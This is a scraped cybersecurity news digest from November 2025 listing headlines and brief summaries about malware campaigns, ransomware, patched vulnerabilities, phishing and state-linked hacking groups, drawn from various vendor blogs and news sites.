| 15.11.25 | Advanced Threat Hunting: Four Techniques to Detect Phishing Infrastructure Before it Strikes | In cyber defense, reacting to a phishing attack means you’re already one step behind. A phishing email in an inbox is the end result of a long chain of attacker activity. The real win isn’t just analyzing the phish; it’s finding the infrastructure it came from before the attack is even launched using a proactive threat hunting model. | Phishing blog | Silent Push |
| 15.11.25 | | The prevalence of obfuscation and multi-stage layering in today’s malware often forces analysts into tedious and manual debugging sessions. For instance, the primary challenge of analyzing pervasive commodity stealers like AgentTesla isn’t identifying the malware, but quickly cutting through the obfuscated delivery chain to get to the final payload. | Malware blog | Google Threat Intelligence |
| 15.11.25 | | Mandiant Threat Defense has uncovered exploitation of an unauthenticated access vulnerability within Gladinet’s Triofox file-sharing and remote access platform. This now-patched n-day vulnerability, assigned CVE-2025-12480, allowed an attacker to bypass authentication and access the application configuration pages, enabling the upload and execution of arbitrary payloads. | Vulnerability blog | Google Threat Intelligence |
| 15.11.25 | | Every November, we make it our mission to equip organizations with the knowledge needed to stay ahead of threats we anticipate in the coming year. The Cybersecurity Forecast 2026 report, released today, provides comprehensive insights to help security leaders and teams prepare for those challenges. | Cyber blog | Google Threat Intelligence |
| 15.11.25 | | Global Overview In October 2025, the global volume of cyber attacks continued its upward trajectory. ... | Ransom blog | CHECKPOINT |
| 15.11.25 | | Cyber threats don’t always come with warning signs. Sometimes, they arrive as sponsored ads. Since .. | Hacking blog | CHECKPOINT |
| 15.11.25 | Germany Urges Attack Surface Management Adoption as Routinely as Antivirus Protection | Germany’s Threat Landscape is growing at an unprecedented pace with attack surfaces expanding, APT actors dominating, and SMEs bearing the brunt of this offense. Here’s what you need to know. | APT blog | Cyble |
| 15.11.25 | October 2025 Attacks Soar 30% as New Groups Redefine the Cyber Battlefield | Near-record ransomware attacks and the rise of new threats like Sinobi highlight the need for rapid detection and response. | Cyber blog | Cyble |
| 15.11.25 | The Week in Vulnerabilities: From IT Systems to Airport Weather Monitoring | Vulnerabilities flagged by Cyble this week cover everything from IT and security products to critical airport weather systems. | Vulnerability blog | Cyble |
| 15.11.25 | Multi-Brand themed Phishing Campaign Harvests Credentials via Telegram Bot API | CRIL analyzed an active phishing campaign leveraging HTML-based Telegram bot credential harvesters designed to mimic multiple prominent brands | Phishing blog | Cyble |
| 15.11.25 | Redis 8.2.2: Hardening the Lua Engine Against Four Critical Vulnerabilities | Introduction Redis is an open-source, in-memory data store widely used as a cache, message broker, and high-performance NoSQL database. It offers rich data structures like strings, hashes, lists, sets, sorted sets, bitmaps, HyperLogLogs, and streams, backed by atomic operations... | Vulnerability blog | Seqrite |
| 15.11.25 | APT PROFILE – BRONZE BUTLER | BRONZE BUTLER, also known as Tick or REDBALDKNIGHT, is a sophisticated and persistent cyber espionage group believed to originate from China. The group primarily targets Japanese | APT blog | Cyfirma |
| 15.11.25 | Security brief: VenomRAT is defanged | VenomRAT is a commodity remote access trojan (RAT) used by multiple cybercriminal threat actors. Around since 2020 but first observed in Proofpoint data in 2022, VenomRAT was used most frequently by the hotel and hospitality targeting threat actor TA558. The malware is based on the open-source malware Quasar RAT. VenomRAT is essentially a clone of Quasar RAT with some extra components bolted on from other sources. | Malware blog | PROOFPOINT |
| 15.11.25 | Operation Endgame Quakes Rhadamanthys | Rhadamanthys is a prominent malware observed since 2022, used by multiple cybercriminal threat actors. | Malware blog | PROOFPOINT |
| 15.11.25 | Crossed wires: a case study of Iranian espionage and attribution | Between June and August 2025, Proofpoint began tracking a previously unidentified threat actor dubbed UNK_SmudgedSerpent targeting academics and foreign policy experts. | BigBrother blog | PROOFPOINT |
| 15.11.25 | Increase in Lumma Stealer Activity Coincides with Use of Adaptive Browser Fingerprinting Tactics | In this blog entry, Trend™ Research analyses the layered command-and-control approaches that Lumma Stealer uses to maintain its ongoing operations while enhancing collection of victim-environment data. | Malware blog | Trend Micro |
| 15.11.25 | Covert AutoIt Campaign Delivering Infostealers and RATs | Recently, the SonicWall Capture Labs threat research team has identified a new campaign delivering infostealer payloads using malicious AutoIt scripts along with the AutoIt interpreter. The campaign was observed delivering various payloads including Snake Stealer, XWorm, and Remcos RAT. | Malware blog | SonicWall |
| 15.11.25 | A Look At RondoDox ARM Malware | This week, the SonicWall Capture Labs Threat Research Team analyzed a sample of RondoDox, a Linux botnet infector. This malware is often paired with Mirai, and once installed on a victim system, it accepts C2 commands and can perform system reconnaissance while joining botnet DDoS activities. It has several methods of evading detection along with anti-debugging capabilities. | Malware blog | SonicWall |
| 15.11.25 | Microsoft Security Bulletin Coverage for November 2025 | Microsoft’s November 2025 Patch Tuesday has 63 vulnerabilities, of which 29 are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2025 and has produced coverage for 5 of the reported vulnerabilities. | Vulnerability blog | SonicWall |
| 15.11.25 | Nested Deserialization to RCE in Adobe Commerce & Magento (CVE-2025-54236) | The SonicWall Capture Labs threat research team became aware of an Improper Input Validation Vulnerability in Adobe Commerce and Magento Open-Source Platforms, assessed its impact and developed mitigation measures. Adobe Commerce and Magento Open-Source Platforms are e-commerce platforms that empower businesses to scale efficiently. Expanding on the trusted foundation of Magento, Adobe Commerce offers enterprise scale and performance, modern, API-first development, and seamless integration. | Vulnerability blog | SonicWall |
| 15.11.25 | Command Injection in HuangDou UTCMS (CVE-2024-9916) Enables RCE | The SonicWall Capture Labs threat research team would like to highlight the vulnerability listed under CVE-2024-9916, as it remains unpatched and poses a potential risk to customer environments. Below is an analysis of the vulnerability itself, along with the mitigation measures against exploits that may target this vulnerability. | Vulnerability blog | SonicWall |
| 15.11.25 | You Thought It Was Over? Authentication Coercion Keeps Evolving | Imagine a scenario where malicious actors don’t need to trick you into giving up your password. They have no need to perform sophisticated social engineering attacks or exploit vulnerabilities in your operating system. | Security blog | Palo Alto |
| 15.11.25 | The State of Ransomware – Q3 2025 | Record fragmentation and decentralization: The number of active extortion groups in Q3 2025 rose to a record of 85 groups, the highest number observed to date. The top 10 groups accounted only for 56% of all published victims, down from 71% in Q1. | Ransom blog | CHECKPOINT |
| 15.11.25 | Unleashing the Kraken ransomware group | In August 2025, Cisco Talos observed big-game hunting and double extortion attacks carried out by Kraken, a Russian-speaking group that has emerged from the remnants of the HelloKitty ransomware cartel. | Ransom blog | CISCO TALOS |
| 15.11.25 | Viasat and the terrible, horrible, no good, very bad day | In this week’s newsletter, Amy recounts her journey from Halloween festivities to unraveling the story of the 2022 Viasat satellite hack, with plenty of cybersecurity surprises along the way. | Hacking blog | CISCO TALOS |
| 15.11.25 | How password managers can be hacked – and how to stay safe | | Hacking blog | Eset |
| 15.11.25 | Why shadow AI could be your biggest security blind spot | From unintentional data leakage to buggy code, here’s why you should care about unsanctioned AI use in your company | AI blog | Eset |
| 15.11.25 | How Trellix Helix detects AS-REP Roasting in Active Directory | Adversaries use AS-REP Roasting to extract and crack password hashes from Active Directory (AD) accounts with Kerberos pre-authentication disabled, a misconfiguration that exposes credentials to offline brute force attacks. | Hacking blog | Trellix |
| 15.11.25 | Dark Web Roast - October 2025 Edition | Welcome to October 2025, where the cybercrime underground has officially become more absurd than a fever dream. | Cyber blog | Trellix |
| 14.11.25 | Microsoft releases KB5068781 — The first Windows 10 extended security update | Microsoft has released the KB5068781 update, the first Windows 10 extended security update since the operating system reached end of support last month. | OS | |
| 14.11.25 | Microsoft November 2025 Patch Tuesday fixes 1 zero-day, 63 flaws | Today is Microsoft's November 2025 Patch Tuesday, which includes security updates for 63 flaws, including one actively exploited zero-day vulnerability. | OS | |
| 14.11.25 | Windows 11 KB5068861 & KB5068865 cumulative updates released | Microsoft has released Windows 11 KB5068861 and KB5068865 cumulative updates for versions 25H2/24H2 and 23H2 to fix security vulnerabilities, bugs, and add new features. | OS | |
| 14.11.25 | Microsoft: Emergency Windows 10 update fixes ESU enrollment bug | Microsoft has released an emergency out-of-band update to address a known issue preventing Windows 10 users from enrolling in the Extended Security Updates (ESU) program. | OS | |
| 14.11.25 | “Bitcoin Queen” gets 11 years in prison for $7.3 billion Bitcoin scam | A Chinese woman known as the "Bitcoin Queen" was sentenced in London to 11 years and eight months in jail for laundering Bitcoin from a £5.5 billion ($7.3 billion) cryptocurrency investment scheme. | Cryptocurrency | |
| 14.11.25 | SAP fixes hardcoded credentials flaw in SQL Anywhere Monitor | SAP has released its November security updates that address multiple security vulnerabilities, including a maximum severity flaw in the non-GUI variant of the SQL Anywhere Monitor and a critical code injection issue in the Solution Manager platform. | Vulnerability | |
| 14.11.25 | GlobalLogic warns 10,000 employees of data theft after Oracle breach | GlobalLogic, a provider of digital engineering services part of the Hitachi group, is notifying over 10,000 current and former employees that their data was stolen in an Oracle E-Business Suite (EBS) data breach. | Incident | |
| 14.11.25 | APT37 hackers abuse Google Find Hub in Android data-wiping attacks | North Korean hackers from the KONNI activity cluster are abusing Google's Find Hub tool to track their targets' GPS positions and trigger remote factory resets of Android devices. | APT | |
| 14.11.25 | Mozilla Firefox gets new anti-fingerprinting defenses | Mozilla announced a major privacy upgrade in Firefox 145 that further reduces the number of users vulnerable to digital fingerprinting. | Safety | |
| 14.11.25 | Quantum Route Redirect PhaaS targets Microsoft 365 users worldwide | A new phishing automation platform named Quantum Route Redirect is using around 1,000 domains to steal Microsoft 365 users' credentials. | Phishing | |
| 14.11.25 | CISA orders feds to patch Samsung zero-day used in spyware attacks | CISA ordered U.S. federal agencies today to patch a critical Samsung vulnerability that has been exploited in zero-day attacks to deploy LandFall spyware on devices running WhatsApp. | Vulnerability | |
| 14.11.25 | Yanluowang initial access broker pleaded guilty to ransomware attacks | A Russian national will plead guilty to acting as an initial access broker (IAB) for Yanluowang ransomware attacks that targeted at least eight U.S. companies between July 2021 and November 2022. | Ransom | |
| 14.11.25 | Popular JavaScript library expr-eval vulnerable to RCE flaw | A critical vulnerability in the popular expr-eval JavaScript library, with over 800,000 weekly downloads on NPM, can be exploited to execute code remotely through maliciously crafted input. | Vulnerability | |
| 14.11.25 | How to use the new Windows 11 Start menu, now rolling out | The Windows Start menu is getting its first major redesign since 2021 and will be rolled out to everyone with the November 11 Patch Tuesday update. | OS | |
| 14.11.25 | NAKIVO Introduces v11.1 with Upgraded Disaster Recovery and MSP Features | NAKIVO Backup & Replication v11.1 expands disaster recovery with real-time replication, enhanced Proxmox VE support, and granular physical backups. The update adds MSP Direct Connect for secure client management and a multilingual interface supporting seven languages. | Safety | |
| 14.11.25 | Lost iPhone? Don’t fall for phishing texts saying it was found | The Swiss National Cyber Security Centre (NCSC) is warning iPhone owners about a phishing scam that claims to have found your lost or stolen iPhone but is actually trying to steal your Apple ID credentials. | Phishing | |
| 14.11.25 | Dangerous runC flaws could allow hackers to escape Docker containers | Three newly disclosed vulnerabilities in the runC container runtime used in Docker and Kubernetes could be exploited to bypass isolation restrictions and get access to the host system. | Vulnerability | |
| 14.11.25 | Ransomware's Fragmentation Reaches a Breaking Point While LockBit Returns | Key Takeaways: 85 active ransomware and extortion groups observed in Q3 2025, reflecting the most decentralized ransomware ecosystem to date. 1,590 victims disclosed across 85 | Ransom | The Hacker News |
| 14.11.25 | Chinese Hackers Use Anthropic's AI to Launch Automated Cyber Espionage Campaign | State-sponsored threat actors from China used artificial intelligence (AI) technology developed by Anthropic to orchestrate automated cyber attacks as part of a "highly | AI | The Hacker News |
| 14.11.25 | Now-Patched Fortinet FortiWeb Flaw Exploited in Attacks to Create Admin Accounts | Cybersecurity researchers are sounding the alert about an authentication bypass vulnerability in Fortinet FortiWeb WAF that could allow an attacker to take over admin accounts and | Vulnerability | The Hacker News |
| 14.11.25 | Russian Hackers Create 4,300 Fake Travel Sites to Steal Hotel Guests' Payment Data | A Russian-speaking threat actor behind an ongoing, mass phishing campaign has registered more than 4,300 domain names since the start of the year. The activity, per Netcraft security | Phishing | The Hacker News |
| 13.11.25 | Fake Chrome Extension "Safery" Steals Ethereum Wallet Seed Phrases Using Sui Blockchain | Cybersecurity researchers have uncovered a malicious Chrome extension that poses as a legitimate Ethereum wallet but harbors functionality to exfiltrate users' seed phrases. The | Cryptocurrency | The Hacker News |
| 13.11.25 | Operation Endgame Dismantles Rhadamanthys, Venom RAT, and Elysium Botnet in Global Crackdown | Malware families like Rhadamanthys Stealer, Venom RAT, and the Elysium botnet have been disrupted as part of a coordinated law enforcement operation led by Europol and Eurojust. | Virus | The Hacker News |
| 13.11.25 | ThreatsDay Bulletin: Cisco 0-Days, AI Bug Bounties, Crypto Heists, State-Linked Leaks and 20 More Stories | Behind every click, there's a risk waiting to be tested. A simple ad, email, or link can now hide something dangerous. Hackers are getting smarter, using new tools to sneak past filters and | Cyber | The Hacker News |
| 13.11.25 | CISA Flags Critical WatchGuard Fireware Flaw Exposing 54,000 Fireboxes to No-Login Attacks | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a critical security flaw impacting WatchGuard Fireware to its Known Exploited Vulnerabilities ( | Exploit | The Hacker News |
| 13.11.25 | Over 67,000 Fake npm Packages Flood Registry in Worm-Like Spam Attack | Cybersecurity researchers are calling attention to a large-scale spam campaign that has flooded the npm registry with thousands of fake packages since early 2024 as part of a likely | Spam | The Hacker News |
| 13.11.25 | Google Sues China-Based Hackers Behind $1 Billion Lighthouse Phishing Platform | Google has filed a civil lawsuit in the U.S. District Court for the Southern District of New York (SDNY) against China-based hackers who are behind a massive Phishing-as-a-Service | Phishing | The Hacker News |
| 12.11.25 | Amazon Uncovers Attacks Exploiting Cisco ISE and Citrix NetScaler as Zero-Day Flaws | Amazon's threat intelligence team on Wednesday disclosed that it observed an advanced threat actor exploiting two then-zero-day security flaws in Cisco Identity Service Engine (ISE) | Exploit | The Hacker News |
| 12.11.25 | Microsoft Fixes 63 Security Flaws, Including a Windows Kernel Zero-Day Under Active Attack | Microsoft on Tuesday released patches for 63 new security vulnerabilities identified in its software, including one that has come under active exploitation in the wild. Of the 63 flaws, | OS | The Hacker News |
| 12.11.25 | Google Launches 'Private AI Compute' — Secure AI Processing with On-Device-Level Privacy | Google on Tuesday unveiled a new privacy-enhancing technology called Private AI Compute to process artificial intelligence (AI) queries in a secure platform in the cloud. The company | AI | The Hacker News |
| 12.11.25 | WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks | Threat hunters have uncovered similarities between a banking malware called Coyote and a newly disclosed malicious program dubbed Maverick that has been propagated via | Virus | The Hacker News |
| 12.11.25 | GootLoader Is Back, Using a New Font Trick to Hide Malware on WordPress Sites | The malware known as GootLoader has resurfaced yet again after a brief spike in activity earlier this March, according to new findings from Huntress. The cybersecurity company said | Virus | The Hacker News |
| 11.11.25 | Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories | Cybersecurity researchers have discovered a malicious npm package named "@acitons/artifact" that typosquats the legitimate "@actions/artifact" package with the | Virus | The Hacker News |
| 11.11.25 | Android Trojan 'Fantasy Hub' Malware Service Turns Telegram Into a Hub for Hackers | Cybersecurity researchers have disclosed details of a new Android remote access trojan (RAT) called Fantasy Hub that's sold on Russian-speaking Telegram channels under a | Virus | The Hacker News |
| 11.11.25 | No Place Like Localhost: Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480 | Mandiant Threat Defense has uncovered exploitation of an unauthenticated access vulnerability within Gladinet’s Triofox file-sharing and remote access platform. | Vulnerability blog | Google Threat Intelligence |
| 11.11.25 | Hackers Exploiting Triofox Flaw to Install Remote Access Tools via Antivirus Feature | Google's Mandiant Threat Defense on Monday said it discovered n-day exploitation of a now-patched security flaw in Gladinet's Triofox file-sharing and remote access platform. The | Exploit | The Hacker News |
| 11.11.25 | Konni Hackers Turn Google's Find Hub into a Remote Data-Wiping Weapon | The North Korea-affiliated threat actor known as Konni (aka Earth Imp, Opal Sleet, Osmium, TA406, and Vedalia) has been attributed to a new set of attacks targeting both Android and | APT | The Hacker News |
| 10.11.25 | Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware | Cybersecurity researchers have called attention to a massive phishing campaign targeting the hospitality industry that lures hotel managers to ClickFix-style pages and harvest their | Virus | The Hacker News |
| 10.11.25 | GlassWorm Malware Discovered in Three VS Code Extensions with Thousands of Installs | Cybersecurity researchers have disclosed a new set of three extensions associated with the GlassWorm campaign, indicating continued attempts on part of threat actors to target the | Virus | The Hacker News |
| 9.11.25 | GlassWorm malware returns on OpenVSX with 3 new VSCode extensions | The GlassWorm malware campaign, which impacted the OpenVSX and Visual Studio Code marketplaces last month, has returned with three new VSCode extensions that have already been downloaded over 10,000 times. | Virus | |
| 9.11.25 | Still on Windows 10? Enroll in free ESU before next week’s Patch Tuesday | With the first Patch Tuesday following Windows 10's end of support approaching next week, users who continue to run the operating system should enroll in the Extended Security Updates (ESU) program to remain protected against newly discovered security vulnerabilities. | OS | |
| 9.11.25 | Malicious NuGet packages drop disruptive 'time bombs' | Several malicious packages on NuGet have sabotage payloads scheduled to activate in 2027 and 2028, targeting database implementations and Siemens S7 industrial control devices. | Hack | |
| 9.11.25 | Microsoft testing faster Quick Machine Recovery in Windows 11 | Microsoft is testing a faster version of Quick Machine Recovery (QMR) and updated Smart App Control (SAC), allowing users to toggle it without requiring a Windows clean install. | OS | |
| 9.11.25 | QNAP fixes seven NAS zero-day flaws exploited at Pwn2Own | QNAP has fixed seven zero-day vulnerabilities that security researchers exploited to hack QNAP network-attached storage (NAS) devices during the Pwn2Own Ireland 2025 competition. | Exploit | |
| 9.11.25 | New LandFall spyware exploited Samsung zero-day via WhatsApp messages | A threat actor exploited a zero-day vulnerability in Samsung's Android image processing library to deploy a previously unknown spyware called 'LandFall' using malicious images sent over WhatsApp. | Exploit | |
| 9.11.25 | Cisco: Actively exploited firewall flaws now abused for DoS attacks | Cisco warned this week that two vulnerabilities, which have been exploited in zero-day attacks, are now being abused to force ASA and FTD firewalls into reboot loops. | Exploit | |
| 9.11.25 | ID verification laws are fueling the next wave of breaches | ID laws are forcing companies to store massive amounts of sensitive data, turning compliance into a security risk. Acronis explains how integrated backup and cybersecurity platforms help MSPs reduce complexity and close the gaps attackers exploit. | Incident | |
| 9.11.25 | U.S. Congressional Budget Office hit by suspected foreign cyberattack | The U.S. Congressional Budget Office (CBO) confirms it suffered a cybersecurity incident after a suspected foreign hacker breached its network, potentially exposing sensitive data. | Cyber | |
| 9.11.25 | AI-Slop ransomware test sneaks on to VS Code marketplace | A malicious extension with basic ransomware capabilities seemingly created with the help of AI, has been published on Microsoft's official VS Code marketplace. | Ransom | |
| 9.11.25 | How a ransomware gang encrypted Nevada government's systems | The State of Nevada has completed its recovery from a ransomware attack it suffered on August 24, 2025, which impacted 60 state agencies, disrupting critical services related to health and public safety. | Ransom | |
| 9.11.25 | Continuous Purple Teaming: Turning Red-Blue Rivalry into Real Defense | Red and blue teams often operate independently, but attackers don't. Picus Security shows how continuous purple teaming and BAS turn red-blue rivalry into real defense, validating controls and closing gaps in real time. | Cyber | |
| 9.11.25 | ClickFix malware attacks evolve with multi-OS support, video tutorials | ClickFix attacks have evolved to feature videos that guide victims through the self-infection process, a timer to pressure targets into taking risky actions, and automatic detection of the operating system to provide the correct commands. | Virus | |
| 9.11.25 | Critical Cisco UCCX flaw lets attackers run commands as root | Cisco has released security updates to patch a critical vulnerability in the Unified Contact Center Express (UCCX) software, which could enable attackers to execute commands with root privileges. | Vulnerability | |
| 9.11.25 | Sandworm hackers use data wipers to disrupt Ukraine's grain sector | Russian state-backed hacker group Sandworm has deployed multiple data-wiping malware families in attacks targeting Ukraine's education, government, and the grain sector, the country's main revenue source. | Virus | |
| 9.11.25 | Gootloader malware is back with new tricks after 7-month break | The Gootloader malware loader operation has returned after a 7-month absence and is once again performing SEO poisoning to promote fake websites that distribute the malware. | Virus | |
| 9.11.25 | Hyundai AutoEver America data breach exposes SSNs, drivers licenses | Hyundai AutoEver America is notifying individuals that hackers breached the company's IT environment and gained access to personal information. | Incident | |
| 9.11.25 | CISA warns of critical CentOS Web Panel bug exploited in attacks | The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning that threat actors are exploiting a critical remote command execution flaw in CentOS Web Panel (CWP). | Exploit | |
| 9.11.25 | Windows 11 Store gets Ninite-style multi-app installer feature | The Microsoft Store on the web now lets you create a multi-app install package on Windows 11 that installs multiple applications from a single installer. | OS | |
| 9.11.25 | SonicWall says state-sponsored hackers behind September security breach | SonicWall's investigation into the September security breach that exposed customers' firewall configuration backup files concludes that state-sponsored hackers were behind the attack. | Incident | |
| 9.11.25 | UK carriers to block spoofed phone numbers in fraud crackdown | Under a new partnership with the government aimed at combating fraud, Britain's largest mobile carriers have committed to upgrading their networks to eliminate scammers' ability to spoof phone numbers within a year. | CyberCrime | |
| 9.11.25 | University of Pennsylvania confirms data stolen in cyberattack | The University of Pennsylvania has confirmed that a hacker breached numerous internal systems related to the university's development and alumni activities and stole data in a cyberattack. | Incident | |
| 9.11.25 | Cyber theory vs practice: Are you navigating with faulty instruments? | Security teams rely on dashboards and data feeds, but outdated or fragmented tools leave dangerous blind spots across assets, vulnerabilities, and credentials. Learn how Outpost24's CompassDRP unifies EASM and DRP to reveal what attackers see and what's already exposed. | Vulnerability | |
| 9.11.25 | Google warns of new AI-powered malware families deployed in the wild | Google's Threat Intelligence Group (GTIG) has identified a major shift this year, with adversaries leveraging artificial intelligence to deploy new malware families that integrate large language models (LLMs) during execution. | AI | |
| 9.11.25 | Police busts credit card fraud rings with 4.3 million victims | International authorities have dismantled three massive credit card fraud and money laundering networks, linked to losses exceeding €300 million ($344 million) and affecting over 4.3 million cardholders across 193 countries. | CyberCrime | |
| 9.11.25 | US sanctions North Korean bankers linked to cybercrime, IT worker fraud | The U.S. Treasury Department imposed sanctions on two North Korean financial institutions and eight individuals involved in laundering cryptocurrency stolen in cybercrime and fraudulent IT worker schemes. | APT | |
| 9.11.25 | Microsoft: October Windows updates trigger BitLocker recovery | Microsoft has warned that some systems may boot into BitLocker recovery after installing the October 2025 Windows security updates. | OS | |
| 9.11.25 | Hackers exploit WordPress plugin Post SMTP to hijack admin accounts | Threat actors are actively exploiting a critical vulnerability in the Post SMTP plugin installed on more than 400,000 WordPress sites, to take complete control by hijacking administrator accounts. | Exploit | |
| 9.11.25 | Apache OpenOffice disputes data breach claims by ransomware gang | The Apache Software Foundation disputes claims that its OpenOffice project suffered an Akira ransomware attack, after the threat actors claimed to have stolen 23 GB of corporate documents. | Ransom | |
| 9.11.25 | Malicious Android apps on Google Play downloaded 42 million times | Hundreds of malicious Android apps on Google Play were downloaded more than 40 million times between June 2024 and May 2025, notes a report from cloud security company Zscaler. | Virus | |
| 8.11.25 | Microsoft Uncovers 'Whisper Leak' Attack That Identifies AI Chat Topics in Encrypted Traffic | Microsoft has disclosed details of a novel side-channel attack targeting remote language models that could enable a passive adversary with capabilities to observe network traffic to | AI | The Hacker News |
| 8.11.25 | Microsoft removing Defender Application Guard from Office | Microsoft plans to remove Defender Application Guard from Office by December 2027, starting with the February 2026 release of Office version 2602. | Security | |
| 8.11.25 | Data breach at major Swedish software supplier impacts 1.5 million | The Swedish Authority for Privacy Protection (IMY) is investigating a cyberattack on IT systems supplier Miljödata that exposed data belonging to 1.5 million people. | Incident | |
| 8.11.25 | Media giant Nikkei reports data breach impacting 17,000 people | Japanese publishing giant Nikkei announced earlier today that its Slack messaging platform had been compromised, exposing the personal information of over 17,000 employees and business partners. | Incident | |
| 8.11.25 | Police arrests suspects linked to €600 million crypto fraud ring | European law enforcement authorities have arrested nine suspected money launderers who set up a cryptocurrency fraud network that stole over €600 million ($689 million) from victims across multiple countries. | CyberCrime | |
| 8.11.25 | The Top 3 Browser Sandbox Threats That Slip Past Modern Security Tools | Attackers exploit web browsers' built-in behaviors to steal credentials, abuse extensions, and move laterally, slipping past traditional defenses. Learn from Keep Aware how browser-layer visibility and policy enforcement stop these hidden threats in real time. | Safety | |
| 8.11.25 | Russian hackers abuse Hyper-V to hide malware in Linux VMs | The Russian hacker group Curly COMrades is abusing Microsoft Hyper-V in Windows to bypass endpoint detection and response solutions by creating a hidden Alpine Linux-based virtual machine to run malware. | Virus | |
| 8.11.25 | Windows 10 update bug triggers incorrect end-of-support alerts | Microsoft says the October 2025 updates trigger incorrect end-of-support warnings on Windows 10 systems with active security coverage or still under active support. | OS | |
| 8.11.25 | Hackers exploit critical auth bypass flaw in JobMonster WordPress theme | Threat actors are targeting a critical vulnerability in the JobMonster WordPress theme that allows hijacking of administrator accounts under certain conditions. | Exploit | |
| 8.11.25 | Hacker steals over $120 million from Balancer DeFi crypto protocol | The Balancer Protocol announced that hackers had targeted its v2 pools, with losses reportedly estimated to be more than $128 million. | Incident | |
| 8.11.25 | Fake Solidity VSCode extension on Open VSX backdoors developers | A remote access trojan dubbed SleepyDuck, and disguised as the well-known Solidity extension in the Open VSX open-source registry, uses an Ethereum smart contract to establish a communication channel with the attacker. | Virus | |
| 8.11.25 | Microsoft: SesameOp malware abuses OpenAI Assistants API in attacks | Microsoft security researchers have discovered a new backdoor malware that uses the OpenAI Assistants API as a covert command-and-control channel. | Virus | |
| 8.11.25 | US cybersecurity experts indicted for BlackCat ransomware attacks | Three former employees of cybersecurity incident response companies DigitalMint and Sygnia have been indicted for allegedly hacking the networks of five U.S. companies in BlackCat (ALPHV) ransomware attacks between May 2023 and November 2023. | Ransom | |
| 8.11.25 | Hackers use RMM tools to breach freighters and steal cargo shipments | Threat actors are targeting freight brokers and trucking carriers with malicious links and emails to deploy remote monitoring and management tools (RMMs) that enable them to hijack cargo and steal physical goods. | Incident | |
| 8.11.25 | Microsoft: Patch for WSUS flaw disabled Windows Server hotpatching | An out-of-band (OOB) security update that patches an actively exploited Windows Server Update Service (WSUS) vulnerability has broken hotpatching on some Windows Server 2025 devices. | OS | |
| 8.11.25 | OAuth Device Code Phishing: Azure vs. Google Compared | Device code phishing abuses the OAuth device flow, and Google and Azure produce strikingly different attack surfaces. Register for Huntress Labs' Live Hack to learn about attack techniques, defensive tactics, and get an Identity Security Assessment. | Security | |
| 8.11.25 | Microsoft: Windows Task Manager won’t quit after KB5067036 update | Microsoft has confirmed a known issue that is preventing users from quitting the Windows 11 Task Manager after installing the October 2025 optional update. | OS | |
| 8.11.25 | How PowerShell Gallery simplifies attacks | PowerShell Gallery’s Install-Module command presents one key link in the kill chain of a possible attack. | Hacking blog | REVERSINGLABS |
| 8.11.25 | China-linked Actors Maintain Focus on Organizations Influencing U.S. Policy | Recent compromise of a non-profit organization reflects continued interest in U.S. policy. | APT blog | SECURITY.COM |
| 8.11.25 | Mastering DORA’s Five Pillars with Preemptive Cyber Defense | The Digital Operational Resilience Act (DORA) represents a paradigm shift for the EU’s financial sector. No longer is a reactive security posture enough. DORA mandates a comprehensive, proactive, and testable framework for managing ICT risk and ensuring digital operational resilience. | Cyber blog | Silent Push |
| 8.11.25 | | Every November, we make it our mission to equip organizations with the knowledge needed to stay ahead of threats we anticipate in the coming year. The Cybersecurity Forecast 2026 report, released today, provides comprehensive insights to help security leaders and teams prepare for those challenges. | Cyber blog | Google Threat Intelligence |
| 8.11.25 | | Privileged access stands as the most critical pathway for adversaries seeking to compromise sensitive systems and data. Its protection is not only a best practice, it is a fundamental imperative for organizational resilience. | Cyber blog | Google Threat Intelligence |
| 8.11.25 | | Google Threat Intelligence Group (GTIG) is tracking a cluster of financially motivated threat actors operating from Vietnam that leverages fake job postings on legitimate platforms to target individuals in the digital advertising and marketing sectors. | APT blog | Google Threat Intelligence |
| 8.11.25 | | Key Highlights XLoader 8.0 malware is one of the most evasive and persistent information stealers ... | Malware blog | CHECKPOINT |
| 8.11.25 | | Trust alone isn’t a security strategy. That’s the key lesson from new research by Check ... | Exploit blog | CHECKPOINT |
| 8.11.25 | | Introduction Over the past few months, we identified an emerging online threat that combines fraud, ... | AI blog | CHECKPOINT |
| 8.11.25 | Australia Strengthens Regional Cyber Partnerships to Bolster Security Across the Asia-Pacific | Australia, through ACSC and Cyber Affairs and Critical Technology, strengthens Asia-Pacific cybersecurity via PaCSON, APCERT, and regional threat-sharing initiatives. | BigBrother blog | Cyble |
| 8.11.25 | South Africa Launches Pilot for Secure Data Exchange Among Government Agencies | South Africa’s MzansiXchange initiative, led by the National Treasury, is pioneering secure data exchange across government. | BigBrother blog | Cyble |
| 8.11.25 | Software Supply Chain Attacks Surge to Record High in October 2025 | Software supply chain attacks in October were 32% above previous records, according to Cyble data. | Hacking blog | Cyble |
| 8.11.25 | The Week in Vulnerabilities: Cyble Urges Apache, Microsoft Fixes | This week’s vulnerability report examines 15 IT and ICS flaws at high risk of exploitation by threat actors. | Vulnerability blog | Cyble |
| 8.11.25 | Securing India’s Financial Future: Why the DPDP Act is a Game-Changer for BFSI | India’s Banking, Financial Services, and Insurance (BFSI) industry stands at the intersection of innovation and risk. From UPI and digital wallets to AI-based lending and predictive underwriting, digital transformation is no longer a differentiator — it’s the operating model. | Cyber blog | Seqrite |
| 8.11.25 | Operation Peek-a-Baku: Silent Lynx APT makes sluggish shift to Dushanbe | Introduction. Timeline. Key Targets. Industries Affected. Geographical Focus. Infection Chain. Initial Findings. Technical Analysis. Campaign – I The LNK Way. Malicious SILENT LOADER. Malicious LAPLAS Implant – TCP & TLS. Malicious .NET Implant – SilentSweeper. Campaign –.. | APT blog | Seqrite |
| 8.11.25 | TRACKING RANSOMWARE : OCTOBER 2025 | EXECUTIVE SUMMARY In October 2025, ransomware activity surged globally, marking a significant resurgence after a period of mid-year stability. Victim counts climbed to 738, | Ransom blog | Cyfirma |
| 8.11.25 | Fortnightly Vulnerability Summary | Fortnightly Vulnerability Summary CHECK OUT THESE FAST FACTS ON FORTNIGHTLY OBSERVED VULNERABILITIES. Fortnight's Most Impacted Products D-Link | Tenda | Jira Increase in | Vulnerability blog | Cyfirma |
